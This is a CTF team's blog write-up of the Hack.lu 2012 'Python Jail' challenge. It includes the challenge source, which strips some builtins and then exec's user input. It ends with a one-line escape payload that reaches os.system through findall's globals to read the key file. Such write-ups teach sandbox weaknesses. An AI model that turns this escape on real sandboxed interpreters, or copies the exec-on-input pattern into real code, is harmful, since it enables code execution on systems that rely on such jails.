team pong

Dutch CTF "team pong" write-ups and other stuff

Hack.lu CTF 2012 – #7 Python Jail

leave a comment »

The challenge:

You are surrounded by zombies. You heard there's a safe house nearby, but climbing fences is hard with a beer belly. Thank god, there's another surviver over there. "Hey! Help me!", you shout. He just laughs and shakes you off the fence. Asshole. 

Later, you see his dead body lying in front of a high security door secured by automated weapons. Heh... karma is a bitch. But that means you'll have to find another way in. In this nerd area, all the doors are secured with stupid computer puzzles. So, what the heck. Better try this one:

https://ctf.fluxfingers.net/challenges/python_jail/chal.py 
ctf.fluxfingers.net tcp/2045 

Hint: You'll find the entrance in "./key" Notes: This challenge is a tribute to PHDays Finals 2012 challenge 'ndevice'. Thanks again, I had fun solving it. I'm fairly certain that this challenge avoids being exploitable by the tricks we could use in PHDays (the module "os" was imported...). So, no advantage for people who did not attend PHDays.

The sourcecode:

#!/usr/bin/env python
'''
Running instructions.
 sockets are insecure. We do not implement any socket behaviour in this
 file.
 Please make this file +x and run with socat:
    socat TCP-LISTEN:45454,fork EXEC:./chal.py,pty,stderr

Debugging:
 Just execute chal.py and play on terminal, no need to run socat

Note:
 This challenge is a tribute to PHDays Finals 2012 challenge 'ndevice'.
 Thanks again, I had fun solving it.
 
 I'm fairly certain that this challenge avoids being exploitable by
 the tricks we could use in PHDays (the module "os" was imported...).
 So, no advantage for people who did not attend PHDays.
 

'''

def make_secure():
        UNSAFE_BUILTINS = ['open',
         'file',
         'execfile',
         'compile',
	'reload',
	'__import__',
	'eval',
         'input'] ## block objet?
        for func in UNSAFE_BUILTINS:
                del __builtins__.__dict__[func]

from re import findall
make_secure()


print 'Go Ahead, Expoit me >;D'


while True:
    try:
	inp = findall('\S+', raw_input())[0]
	a = None
	exec 'a=' + inp
	print 'Return Value:', a
    except Exception, e:
	print 'Exception:', e

The python jail removes almost all interesting functions from scope by removing them from the builtins dictionary. However we still have a reference to the findall function in the re module. Using this reference all variables available to the findall function can be reached. Via the sys module we reference the os module to execute system and get the contents of the key file:

findall.__globals__[‘sys’].modules[‘os’].system(“cat<key")

Written by teampong

November 9, 2012 at 7:13 am

Posted in Uncategorized

«
»

Leave a comment